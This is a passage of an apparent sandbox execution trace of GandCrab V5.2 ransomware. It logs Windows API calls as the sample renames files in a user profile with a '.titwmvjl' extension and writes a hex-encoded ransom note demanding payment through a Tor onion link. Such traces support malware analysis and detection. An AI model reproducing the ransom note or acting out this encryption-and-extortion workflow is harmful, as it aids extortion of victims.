63\x6d\x76\x69\x78\x47\x6c\x6b\x35\x52\x38\x72\x6b\x32\x5a\x66\x78\x68\x4a\x78\x72\x46\x49\x75\x4c\x51\x54\x73\x52\x72\x61\x69\x77\x63\x44\x4d\x54\x41\x6d\x39\x63\x38\x6b\x64\x72\x2f\x59\x66\x34\x51\x6e\x2b\x62\x76\x37\x79\x4a\x5a\x34\x59\x58\x67\x42\x38\x45\x64\x6c\x31\x58\x64\x53\x6e\x4d\x72\x55\x50\x56\x35\x6f\x72\x63\x42\x78\x33\x32\x65\x73\x48\x6c\x31\x62\x46\x48\x6b\x65\x73\x39\x5a\x39\x66\x77\x6a\x46\x46\x78\x35\x42\x2f\x43\x72\x79\x6e\x36\x49\x30\x62\x54\x68\x36\x53\x78\x71\x78\x53\x4d\x4b\x66\x61\x77\x6c\x59\x6a\x57\x52\x79\x70\x35\x79\x58\x74\x4e\x69\x62\x62\x2b\x63\x7a\x78\x54\x77\x67\x30\x35\x57\x45\x56\x69\x44\x6a\x32\x5a\x4d\x35\x56\x46\x45\x35\x67\x39\x6a\x56\x78\x31\x7a\x4c\x67\x4c\x36\x72\x45\x6f\x78\x76\x62\x50\x33\x2f\x6f\x57\x73\x72\x33\x72\x72\x35\x38\x63\x71\x62\x45\x36\x49\x49\x48\x34\x6b\x33\x74\x74\x34\x75\x37\x69\x71\x7a\x66\x55\x6b\x4a\x6d\x48\x2b\x38\x31\x76\x5a\x62\x56\x7a\x59\x48\x63\x36\x48\x51\x4c\x2f\x56\x4c\x6d\x74\x2b\x59\x37\x68\x52\x6b\x36\x79\x6f\x72\x53\x6a\x31\x70\x6d\x69\x50\x46\x72\x58\x4c\x39\x39\x57\x72\x62\x6c\x41\x59\x36\x4e\x71\x79\x68\x32\x6d\x78\x2f\x6a\x4b\x44\x58\x4d\x5a\x7a\x64\x6c\x55\x51\x32\x4d\x35\x67\x6a\x56\x6c\x38\x36\x6c\x4e\x43\x6f\x33\x37\x4c\x44\x4c\x56\x48\x55\x4a\x64\x38\x73\x75\x41\x37\x78\x48\x61\x76\x47\x4b\x4d\x42\x7a\x7a\x78\x38\x35\x70\x2b\x4a\x2f\x55\x56\x39\x57\x50\x58\x6e\x72\x75\x45\x41\x3d\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d\x0d\x0a\x37\x66\x74\x44\x45\x67\x4c\x62\x2f\x5a\x53\x30\x6c\x63\x6d\x5a\x62\x48\x4d\x36\x31\x4b\x4c\x4a\x78\x51\x4f\x70\x44\x35\x34\x4b\x6b\x77\x36\x53\x62\x73\x73\x67\x66\x33\x59\x41\x57\x4f\x4d\x43\x79\x70\x2b\x4b\x59\x42\x78\x78\x47\x32\x44\x64\x39\x4d\x50\x4a\x45\x70\x44\x37\x41\x73\x6d\x56\x67\x4f\x43\x39\x52\x57\x66\x49\x52\x48\x51\x70\x51\x78\x47\x61\x31\x4c\x50\x47\x7a\x72\x45\x53\x47\x2b\x67\x67\x61\x72\x47\x58\x6f\x36\x62\x63\x47\x50\x4d\x70\x59\x30\x75\x48\x49\x6b\x6d\x67\x32\x38\x51\x55\x71\x68\x54\x73\x67\x6b\x67\x59\x58\x56\x70\x69\x44\x63\x46\x77\x69\x58\x48\x2f\x67\x6c\x4b\x56\x57\x6f\x56\x48\x4b\x43\x50\x5a\x4d\x70\x76\x37\x34\x43\x5a\x32\x4f\x38\x51\x33\x7a\x57\x61\x78\x30\x4b\x49\x52\x43\x2f\x6f\x76\x45\x74\x76\x42\x6d\x64\x6c\x53\x73\x70\x6d\x48\x4e\x76\x55\x46\x49\x4b\x6c\x30\x57\x59\x4e\x61\x41\x79\x77\x30\x53\x4b\x36\x62\x44\x4c\x6c\x46\x33\x79\x50\x71\x42\x35\x67\x6d\x61\x62\x46\x2b\x5a\x2f\x58\x4d\x47\x64\x33\x73\x67\x44\x37\x32\x35\x4a\x33\x2f\x55\x77\x42\x37\x77\x39\x78\x45\x57\x4c\x30\x79\x37\x34\x58\x71\x35\x33\x74\x48\x52\x6e\x4b\x53\x4d\x4a\x2b\x42\x6c\x31\x44\x7a\x65\x69\x71\x6f\x39\x46\x72\x64\x6e\x4d\x4b\x5a\x37\x31\x39\x47\x53\x56\x66\x4f\x2b\x54\x41\x69\x6d\x4c\x72\x37\x73\x34\x43\x75\x47\x41\x73\x70\x43\x61\x6a\x71\x52\x54\x77\x56\x66\x50\x66\x32\x30\x78\x42\x53\x55\x69\x44\x49\x74\x4c\x4f\x4a\x64\x4e\x41\x46\x42\x6e\x56\x71\x72\x4d\x5a\x6f\x52\x2b\x53\x33\x4e\x4c\x47\x59\x6d\x64\x61\x52\x33\x30\x66\x52\x50\x39\x33\x79\x71\x50\x4d\x77\x4c\x4f\x4c\x6a\x54\x36\x4f\x36\x72\x31\x78\x57\x34\x65\x5a\x78\x54\x7a\x50\x4a\x31\x66\x62\x44\x4c\x30\x39\x30\x30\x50\x66\x36\x53\x30\x61\x7a\x37\x4b\x41\x76\x6f\x54\x66\x46\x70\x35\x32\x47\x50\x44\x4b\x78\x35\x43\x68\x42\x75\x64\x72\x6f\x4d\x31\x6f\x4f\x36\x69\x71\x56\x77\x75\x6d\x32\x71\x42\x6c\x76\x5a\x4c\x77\x4b\x72\x74\x4d\x79\x70\x53\x38\x45\x31\x66\x6d\x6c\x58\x7a\x6d\x5a\x37\x71\x64\x34\x42\x75\x77\x75\x67\x57\x43\x77\x59\x30\x7a\x56\x62\x35\x51\x66\x76\x64\x78\x47\x4c\x53\x75\x6a\x37\x62\x69\x41\x77\x44\x50\x69\x71\x54\x4f\x4c\x4b\x50\x47\x67\x6a\x34\x32\x59\x57\x4b\x62\x2b\x2b\x41\x6c\x53\x76\x48\x75\x69\x7a\x34\x45\x59\x45\x71\x42\x45\x36\x69\x4e\x6e\x41\x4e\x66\x68\x77\x4e\x51\x4c\x49\x45\x7a\x31\x52\x6b\x48\x4b\x79\x62\x75\x4d\x4b\x70\x31\x52\x31\x6c\x51\x2f\x70\x75\x51\x65\x65\x7a\x77\x45\x69\x58\x54\x45\x43\x72\x37\x72\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d") returned 4273 [0080.835] WriteFile (in: hFile=0x2d4, lpBuffer=0x2300000*, nNumberOfBytesToWrite=0x2162, lpNumberOfBytesWritten=0x259e590, lpOverlapped=0x0 | out: lpBuffer=0x2300000*, lpNumberOfBytesWritten=0x259e590*=0x2162, lpOverlapped=0x0) returned 1 [0080.836] CloseHandle (hObject=0x2d4) returned 1 [0080.837] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.837] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0080.837] GetSystemTime (in: lpSystemTime=0x25d0400 | out: lpSystemTime=0x25d0400*(wYear=0x7e3, wMonth=0x2, wDayOfWeek=0x1, wDay=0x12, wHour=0x11, wMinute=0x13, wSecond=0x1a, wMilliseconds=0x9b)) [0080.837] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0080.837] GetWindowsDirectoryW (in: lpBuffer=0x2630000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0080.837] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2630200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2630600, lpMaximumComponentLength=0x2630608, lpFileSystemFlags=0x2630604, lpFileSystemNameBuffer=0x2630400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2630600*=0xd2ca4def, lpMaximumComponentLength=0x2630608*=0xff, lpFileSystemFlags=0x2630604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0080.838] wsprintfW (in: param_1=0x25d0000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\crashes\\d2ca4a09d2ca4deb61a.lock") returned 112 [0080.838] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\crashes\\d2ca4a09d2ca4deb61a.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\crashes\\d2ca4a09d2ca4deb61a.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x2d4 [0080.839] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.840] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.840] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\crashes\\") returned 88 [0080.840] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\crashes\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\crashes\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\crashes\\*" [0080.840] FindFirstFileExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\crashes\\*", fInfoLevelId=0x1, lpFindFileData=0x259e5ac, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x259e5ac) returned 0x503978 [0080.840] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.840] FindNextFileW (in: hFindFile=0x503978, lpFindFileData=0x259e5ac | out: lpFindFileData=0x259e5ac) returned 1 [0080.841] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.841] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.841] FindNextFileW (in: hFindFile=0x503978, lpFindFileData=0x259e5ac | out: lpFindFileData=0x259e5ac) returned 1 [0080.841] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2=".") returned 1 [0080.841] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2="..") returned 1 [0080.841] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\crashes\\", lpString2="d2ca4a09d2ca4deb61a.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\crashes\\d2ca4a09d2ca4deb61a.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\crashes\\d2ca4a09d2ca4deb61a.lock" [0080.841] lstrlenW (lpString=".titwmvjl") returned 9 [0080.841] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\crashes\\d2ca4a09d2ca4deb61a.lock") returned 112 [0080.841] VirtualAlloc (lpAddress=0x0, dwSize=0x120, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0080.841] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\crashes\\d2ca4a09d2ca4deb61a.lock.titwmvjl") returned 121 [0080.841] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\crashes\\d2ca4a09d2ca4deb61a.lock") returned 112 [0080.841] lstrlenW (lpString=".lock") returned 5 [0080.841] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0080.841] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".lock ") returned 6 [0080.841] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.842] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.842] FindNextFileW (in: hFindFile=0x503978, lpFindFileData=0x259e5ac | out: lpFindFileData=0x259e5ac) returned 1 [0080.842] lstrcmpW (lpString1="events", lpString2=".") returned 1 [0080.842] lstrcmpW (lpString1="events", lpString2="..") returned 1 [0080.842] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\crashes\\", lpString2="events" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\crashes\\events") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\crashes\\events" [0080.842] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\crashes\\events", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\crashes\\events\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\crashes\\events\\" [0080.842] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x25d0000 [0080.842] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0080.842] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0080.842] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0080.842] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0080.843] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0080.843] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0080.843] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0080.843] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0080.843] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.843] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0080.843] wsprintfW (in: param_1=0x25d0200, param_2="%s\\%s-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\crashes\\events\\\\TITWMVJL-DECRYPT.txt") returned 116 [0080.843] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\crashes\\events\\\\TITWMVJL-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\crashes\\events\\titwmvjl-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2dc [0080.844] lstrlenW (lpString="\xfeff\x2d\x2d\x2d\x3d\x20\x20\x20\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x56\x35\x2e\x32\x20\x20\x20\x20\x3d\x2d\x2d\x2d\x20\x0d\x0a\x0d\x0a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x55\x4e\x44\x45\x52\x20\x4e\x4f\x20\x43\x49\x52\x43\x55\x4d\x53\x54\x41\x4e\x43\x45\x53\x20\x44\x4f\x20\x4e\x4f\x54\x20\x44\x45\x4c\x45\x54\x45\x20\x54\x48\x49\x53\x20\x46\x49\x4c\x45\x2c\x20\x55\x4e\x54\x49\x4c\x20\x41\x4c\x4c\x20\x59\x4f\x55\x52\x20\x44\x41\x54\x41\x20\x49\x53\x20\x52\x45\x43\x4f\x56\x45\x52\x45\x44\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x09\x2a\x2a\x2a\x2a\x2a\x46\x41\x49\x4c\x49\x4e\x47\x20\x54\x4f\x20\x44\x4f\x20\x53\x4f\x2c\x20\x57\x49\x4c\x4c\x20\x52\x45\x53\x55\x4c\x54\x20\x49\x4e\x20\x59\x4f\x55\x52\x20\x53\x59\x53\x54\x45\x4d\x20\x43\x4f\x52\x52\x55\x50\x54\x49\x4f\x4e\x2c\x20\x49\x46\x20\x54\x48\x45\x52\x45\x20\x41\x52\x45\x20\x44\x45\x43\x52\x59\x50\x54\x49\x4f\x4e\x20\x45\x52\x52\x4f\x52\x53\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x41\x74\x74\x65\x6e\x74\x69\x6f\x6e\x21\x20\x0d\x0a\x0d\x0a\x41\x6c\x6c\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2c\x20\x64\x6f\x63\x75\x6d\x65\x6e\x74\x73\x2c\x20\x70\x68\x6f\x74\x6f\x73\x2c\x20\x64\x61\x74\x61\x62\x61\x73\x65\x73\x20\x61\x6e\x64\x20\x6f\x74\x68\x65\x72\x20\x69\x6d\x70\x6f\x72\x74\x61\x6e\x74\x20\x66\x69\x6c\x65\x73\x20\x61\x72\x65\x20\x65\x6e\x63\x72\x79\x70\x74\x65\x64\x20\x61\x6e\x64\x20\x68\x61\x76\x65\x20\x74\x68\x65\x20\x65\x78\x74\x65\x6e\x73\x69\x6f\x6e\x3a\x20\x2e\x54\x49\x54\x57\x4d\x56\x4a\x4c\x20\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x6f\x6e\x6c\x79\x20\x6d\x65\x74\x68\x6f\x64\x20\x6f\x66\x20\x72\x65\x63\x6f\x76\x65\x72\x69\x6e\x67\x20\x66\x69\x6c\x65\x73\x20\x69\x73\x20\x74\x6f\x20\x70\x75\x72\x63\x68\x61\x73\x65\x20\x61\x6e\x20\x75\x6e\x69\x71\x75\x65\x20\x70\x72\x69\x76\x61\x74\x65\x20\x6b\x65\x79\x2e\x20\x4f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x67\x69\x76\x65\x20\x79\x6f\x75\x20\x74\x68\x69\x73\x20\x6b\x65\x79\x20\x61\x6e\x64\x20\x6f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x72\x65\x63\x6f\x76\x65\x72\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2e\x0d\x0a\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x73\x65\x72\x76\x65\x72\x20\x77\x69\x74\x68\x20\x79\x6f\x75\x72\x20\x6b\x65\x79\x20\x69\x73\x20\x69\x6e\x20\x61\x20\x63\x6c\x6f\x73\x65\x64\x20\x6e\x65\x74\x77\x6f\x72\x6b\x20\x54\x4f\x52\x2e\x20\x59\x6f\x75\x20\x63\x61\x6e\x20\x67\x65\x74\x20\x74\x68\x65\x72\x65\x20\x62\x79\x20\x74\x68\x65\x20\x66\x6f\x6c\x6c\x6f\x77\x69\x6e\x67\x20\x77\x61\x79\x73\x3a\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x7c\x20\x30\x2e\x20\x44\x6f\x77\x6e\x6c\x6f\x61\x64\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x2d\x20\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x74\x6f\x72\x70\x72\x6f\x6a\x65\x63\x74\x2e\x6f\x72\x67\x2f\x20\x0d\x0a\x0d\x0a\x7c\x20\x31\x2e\x20\x49\x6e\x73\x74\x61\x6c\x6c\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x32\x2e\x20\x4f\x70\x65\x6e\x20\x54\x6f\x72\x20\x42\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x33\x2e\x20\x4f\x70\x65\x6e\x20\x6c\x69\x6e\x6b\x20\x69\x6e\x20\x54\x4f\x52\x20\x62\x72\x6f\x77\x73\x65\x72\x3a\x20\x20\x20\x68\x74\x74\x70\x3a\x2f\x2f\x67\x61\x6e\x64\x63\x72\x61\x62\x6d\x66\x65\x36\x6d\x6e\x65\x66\x2e\x6f\x6e\x69\x6f\x6e\x2f\x39\x39\x38\x61\x32\x66\x34\x35\x64\x32\x63\x61\x34\x64\x65\x66\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x7c\x20\x34\x2e\x20\x46\x6f\x6c\x6c\x6f\x77\x20\x74\x68\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x74\x68\x69\x73\x20\x70\x61\x67\x65\x20\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x4f\x6e\x20\x6f\x75\x72\x20\x70\x61\x67\x65\x20\x79\x6f\x75\x20\x77\x69\x6c\x6c\x20\x73\x65\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x70\x61\x79\x6d\x65\x6e\x74\x20\x61\x6e\x64\x20\x67\x65\x74\x20\x74\x68\x65\x20\x6f\x70\x70\x6f\x72\x74\x75\x6e\x69\x74\x79\x20\x74\x6f\x20\x64\x65\x63\x72\x79\x70\x74\x20\x31\x20\x66\x69\x6c\x65\x20\x66\x6f\x72\x20\x66\x72\x65\x65\x2e\x20\x0d\x0a\x0d\x0a\x0d\x0a\x41\x54\x54\x45\x4e\x54\x49\x4f\x4e\x21\x0d\x0a\x0d\x0a\x49\x4e\x20\x4f\x52\x44\x45\x52\x20\x54\x4f\x20\x50\x52\x45\x56\x45\x4e\x54\x20\x44\x41\x54\x41\x20\x44\x41\x4d\x41\x47\x45\x3a\x0d\x0a\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x4d\x4f\x44\x49\x46\x59\x20\x45\x4e\x43\x52\x59\x50\x54\x45\x44\x20\x46\x49\x4c\x45\x53\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x43\x48\x41\x4e\x47\x45\x20\x44\x41\x54\x41\x20\x42\x45\x4c\x4f\x57\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x6c\x41\x51\x41\x41\x42\x42\x6a\x58\x74\x68\x4a\x35\x51\x30\x77\x50\x44\x4f\x69\x52\x2f\x55\x55\x71\x42\x6a\x71\x4e\x47\x47\x52\x4d\x53\x45\x54\x66\x6e\x4b\x46\x4e\x2f\x77\x43\x30\x5a\x32\x79\x38\x75\x58\x4e\x4b\x2f\x63\x51\x52\x78\x51\x2b\x75\x78\x6a\x76\x48\x59\x6f\x52\x4e\x57\x4b\x4f\x77\x79\x70\x66\x53\x6e\x77\x69\x73\x61\x7a\x66\x6f\x32\x49\x75\x35\x76\x57\x57\x2b\x52\x43\x6b\x47\x47\x42\x31\x47\x6e\x65\x73\x51\x6b\x51\x77\x75\x54\x32\x41\x5a\x78\x56\x78\x35\x51\x59\x34\x69\x65\x2b\x6c\x65\x57\x2f\x4d\x5a\x41\x77\x47\x50\x70\x7a\x38\x2f\x37\x64\x5a\x77\x6f\x4c\x2b\x55\x71\x71\x4f\x77\x4d\x70\x54\x47\x33\x2b\x41\x6e\x76\x45\x51\x33\x4c\x4d\x6e\x49\x69\x51\x63\x70\x34\x48\x44\x66\x64\x33\x38\x4d\x50\x52\x43\x73\x52\x36\x67\x71\x63\x49\x48\x6f\x42\x70\x55\x4c\x77\x43\x33\x47\x6d\x37\x78\x7a\x74\x5a\x42\x69\x48\x47\x5a\x67\x5a\x56\x37\x4c\x6e\x61\x67\x51\x6b\x72\x4f\x41\x6c\x77\x54\x31\x36\x69\x70\x71\x4c\x31\x7a\x58\x54\x34\x6b\x4f\x79\x47\x45\x5a\x4c\x53\x6c\x71\x36\x48\x52\x57\x72\x52\x4a\x6b\x59\x53\x51\x35\x7a\x4c\x74\x50\x31\x54\x6b\x34\x68\x6d\x6d\x42\x51\x31\x66\x6f\x6a\x57\x46\x72\x63\x6f\x54\x34\x36\x78\x63\x76\x57\x2b\x33\x53\x33\x30\x6e\x56\x30\x46\x43\x51\x59\x64\x6a\x35\x68\x48\x66\x62\x50\x6c\x62\x4f\x52\x5a\x72\x69\x34\x6e\x2b\x65\x55\x43\x49\x6c\x46\x31\x74\x4b\x78\x62\x45\x69\x51\x74\x4a\x4e\x74\x66\x66\x74\x31\x76\x6b\x59\x31\x62\x6e\x78\x49\x64\x74\x45\x74\x57\x62\x49\x4e\x77\x6c\x75\x6e\x2f\x31\x39\x37\x67\x4f\x72\x72\x49\x58\x4a\x2b\x45\x70\x37\x61\x31\x73\x34\x68\x41\x54\x32\x6b\x45\x6b\x6d\x31\x48\x55\x4e\x39\x39\x46\x55\x4d\x7a\x2b\x49\x73\x51\x45\x4b\x35\x41\x44\x59\x6d\x35\x4a\x73\x42\x55\x61\x63\x59\x6c\x58\x52\x65\x77\x77\x78\x4e\x41\x55\x67\x6b\x77\x54\x51\x31\x69\x78\x57\x48\x63\x68\x36\x4c\x4e\x66\x6f\x46\x62\x78\x2f\x59\x30\x51\x67\x6c\x59\x47\x6c\x37\x36\x62\x4c\x67\x6c\x6a\x67\x6c\x50\x69\x61\x72\x2b\x46\x4d\x6d\x73\x4a\x6b\x48\x44\x78\x58\x46\x41\x64\x70\x56\x50\x4d\x4b\x54\x2b\x50\x70\x63\x6e\x32\x67\x31\x52\x65\x6f\x6d\x79\x5a\x73\x41\x77\x33\x30\x68\x4e\x4d\x79\x59\x43\x74\x79\x7a\x59\x56\x6d\x51\x7a\x4e\x56\x56\x77\x65\x76\x4d\x6b\x70\x71\x33\x44\x66\x76\x30\x76\x48\x65\x43\x6a\x58\x63\x30\x71\x67\x72\x38\x48\x53\x78\x6f\x57\x53\x6c\x56\x42\x7a\x55\x4c\x72\x47\x64\x77\x71\x7a\x61\x62\x59\x79\x6f\x72\x78\x32\x77\x62\x32\x6c\x50\x71\x6e\x43\x73\x4c\x2f\x59\x4f\x74\x63\x72\x69\x65\x50\x62\x77\x73\x57\x59\x46\x5a\x51\x47\x46\x63\x31\x4a\x6f\x71\x4a\x4a\x5a\x35\x4a\x74\x74\x4a\x35\x31\x45\x4c\x44\x52\x43\x4e\x4d\x44\x68\x74\x5a\x76\x42\x66\x61\